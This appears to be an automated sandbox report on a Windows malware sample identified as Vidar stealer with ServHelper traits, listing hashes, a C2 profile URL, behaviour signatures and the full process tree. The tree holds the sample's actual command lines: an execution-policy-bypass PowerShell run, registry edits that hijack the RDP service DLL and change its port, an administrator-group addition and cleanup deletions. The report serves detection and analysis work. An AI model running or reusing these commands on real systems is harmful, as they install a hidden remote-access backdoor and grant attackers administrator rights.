Analysis
-
max time kernel
124s -
max time network
159s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
15-10-2021 22:31
Static task
static1
General
-
Target
92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe
-
Size
727KB
-
MD5
687ce85a38cc8ca331e63a87a3c5cb9e
-
SHA1
70da69b8fe9adbafbbccd38da2e71dd7121e9108
-
SHA256
92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5
-
SHA512
92808823a009e5599d742d0fb522c3db732e35d05fb3a287871a43bbebed8284aa2a60ef574c46a65b0af67a662dea2d7c772a5d0890876336b773b95dbd9cdc
Malware Config
Extracted
vidar
41.4
1008
https://mas.to/@sslam
-
profile_id
1008
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/1720-117-0x0000000000400000-0x0000000001729000-memory.dmp family_vidar behavioral1/memory/1720-116-0x0000000003480000-0x0000000003556000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 3536 UWQP7K70EYNJMAB6.exe 1188 InstallUtil.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Loads dropped DLL 2 IoCs
pid Process 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/3536-130-0x0000000006470000-0x0000000006491000-memory.dmp agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3536 set thread context of 1188 3536 UWQP7K70EYNJMAB6.exe 74 -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2816 1720 WerFault.exe 69 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3168 reg.exe -
NTFS ADS 4 IoCs
description ioc Process File created C:\ProgramData\UWQP7K70EYNJMAB6.exe:Zone.Identifier 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe File opened for modification C:\ProgramData\UWQP7K70EYNJMAB6.exe:Zone.Identifier 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe File created C:\ProgramData\UWQP7K70EYNJMAB6.exeC:\ProgramData\ASU6I7X4LMKK4FC9.exe 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe File created C:\ProgramData\UWQP7K70EYNJMAB6.exe:Zone.IdentifierC:\ProgramData\UWQP7K70EYNJMAB6.exeC:\ProgramData\ASU6I7X4LMKK4FC9.exe:Zone.Identifier 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 37 IoCs
pid Process 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe 2816 WerFault.exe 2816 WerFault.exe 2816 WerFault.exe 2816 WerFault.exe 2816 WerFault.exe 2816 WerFault.exe 2816 WerFault.exe 2816 WerFault.exe 2816 WerFault.exe 2816 WerFault.exe 2816 WerFault.exe 2816 WerFault.exe 3536 UWQP7K70EYNJMAB6.exe 3536 UWQP7K70EYNJMAB6.exe 2120 powershell.exe 2120 powershell.exe 2120 powershell.exe 2208 powershell.exe 2208 powershell.exe 2208 powershell.exe 3372 powershell.exe 3372 powershell.exe 3372 powershell.exe 1300 powershell.exe 1300 powershell.exe 1300 powershell.exe 2120 powershell.exe 2120 powershell.exe 2120 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 624 Process not Found -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeRestorePrivilege 2816 WerFault.exe Token: SeBackupPrivilege 2816 WerFault.exe Token: SeDebugPrivilege 2816 WerFault.exe Token: SeDebugPrivilege 3536 UWQP7K70EYNJMAB6.exe Token: SeDebugPrivilege 2120 powershell.exe Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 3372 powershell.exe Token: SeDebugPrivilege 1300 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1720 wrote to memory of 3536 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe 70 PID 1720 wrote to memory of 3536 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe 70 PID 1720 wrote to memory of 3536 1720 92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe 70 PID 3536 wrote to memory of 1188 3536 UWQP7K70EYNJMAB6.exe 74 PID 3536 wrote to memory of 1188 3536 UWQP7K70EYNJMAB6.exe 74 PID 3536 wrote to memory of 1188 3536 UWQP7K70EYNJMAB6.exe 74 PID 3536 wrote to memory of 1188 3536 UWQP7K70EYNJMAB6.exe 74 PID 3536 wrote to memory of 1188 3536 UWQP7K70EYNJMAB6.exe 74 PID 3536 wrote to memory of 1188 3536 UWQP7K70EYNJMAB6.exe 74 PID 3536 wrote to memory of 1188 3536 UWQP7K70EYNJMAB6.exe 74 PID 3536 wrote to memory of 1188 3536 UWQP7K70EYNJMAB6.exe 74 PID 3536 wrote to memory of 1188 3536 UWQP7K70EYNJMAB6.exe 74 PID 1188 wrote to memory of 2120 1188 InstallUtil.exe 76 PID 1188 wrote to memory of 2120 1188 InstallUtil.exe 76 PID 1188 wrote to memory of 2120 1188 InstallUtil.exe 76 PID 2120 wrote to memory of 3764 2120 powershell.exe 78 PID 2120 wrote to memory of 3764 2120 powershell.exe 78 PID 2120 wrote to memory of 3764 2120 powershell.exe 78 PID 3764 wrote to memory of 2644 3764 csc.exe 79 PID 3764 wrote to memory of 2644 3764 csc.exe 79 PID 3764 wrote to memory of 2644 3764 csc.exe 79 PID 2120 wrote to memory of 2208 2120 powershell.exe 80 PID 2120 wrote to memory of 2208 2120 powershell.exe 80 PID 2120 wrote to memory of 2208 2120 powershell.exe 80 PID 2120 wrote to memory of 3372 2120 powershell.exe 84 PID 2120 wrote to memory of 3372 2120 powershell.exe 84 PID 2120 wrote to memory of 3372 2120 powershell.exe 84 PID 2120 wrote to memory of 1300 2120 powershell.exe 86 PID 2120 wrote to memory of 1300 2120 powershell.exe 86 PID 2120 wrote to memory of 1300 2120 powershell.exe 86 PID 2120 wrote to memory of 3152 2120 powershell.exe 88 PID 2120 wrote to memory of 3152 2120 powershell.exe 88 PID 2120 wrote to memory of 3152 2120 powershell.exe 88 PID 2120 wrote to memory of 3168 2120 powershell.exe 89 PID 2120 wrote to memory of 3168 2120 powershell.exe 89 PID 2120 wrote to memory of 3168 2120 powershell.exe 89 PID 2120 wrote to memory of 1772 2120 powershell.exe 90 PID 2120 wrote to memory of 1772 2120 powershell.exe 90 PID 2120 wrote to memory of 1772 2120 powershell.exe 90 PID 2120 wrote to memory of 3560 2120 powershell.exe 91 PID 2120 wrote to memory of 3560 2120 powershell.exe 91 PID 2120 wrote to memory of 3560 2120 powershell.exe 91 PID 3560 wrote to memory of 3968 3560 net.exe 92 PID 3560 wrote to memory of 3968 3560 net.exe 92 PID 3560 wrote to memory of 3968 3560 net.exe 92 PID 2120 wrote to memory of 2152 2120 powershell.exe 93 PID 2120 wrote to memory of 2152 2120 powershell.exe 93 PID 2120 wrote to memory of 2152 2120 powershell.exe 93 PID 2152 wrote to memory of 3392 2152 cmd.exe 94 PID 2152 wrote to memory of 3392 2152 cmd.exe 94 PID 2152 wrote to memory of 3392 2152 cmd.exe 94 PID 3392 wrote to memory of 3552 3392 cmd.exe 95 PID 3392 wrote to memory of 3552 3392 cmd.exe 95 PID 3392 wrote to memory of 3552 3392 cmd.exe 95 PID 3552 wrote to memory of 688 3552 net.exe 96 PID 3552 wrote to memory of 688 3552 net.exe 96 PID 3552 wrote to memory of 688 3552 net.exe 96 PID 2120 wrote to memory of 2004 2120 powershell.exe 97 PID 2120 wrote to memory of 2004 2120 powershell.exe 97 PID 2120 wrote to memory of 2004 2120 powershell.exe 97 PID 2004 wrote to memory of 2584 2004 cmd.exe 98 PID 2004 wrote to memory of 2584 2004 cmd.exe 98 PID 2004 wrote to memory of 2584 2004 cmd.exe 98 PID 2584 wrote to memory of 2212 2584 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe"C:\Users\Admin\AppData\Local\Temp\92b1cc02d037151eecedb276cee54e94ffcb6fb748d0c8a86c8f10522fef9fb5.exe"1⤵
- Loads dropped DLL
- Checks processor information in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\ProgramData\UWQP7K70EYNJMAB6.exe"C:\ProgramData\UWQP7K70EYNJMAB6.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'4⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m5z3opnl\m5z3opnl.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB571.tmp" "c:\Users\Admin\AppData\Local\Temp\m5z3opnl\CSCF5AFECB2F38B4FD8807DE6863923A1DA.TMP"6⤵PID:2644
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3372
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵PID:3152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f5⤵
- Modifies registry key
PID:3168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f5⤵PID:1772
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵PID:3968
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr6⤵
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\SysWOW64\net.exenet start rdpdr7⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr8⤵PID:688
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService6⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SysWOW64\net.exenet start TermService7⤵PID:2212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService8⤵PID:700
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵PID:824
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵PID:1796
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 22322⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-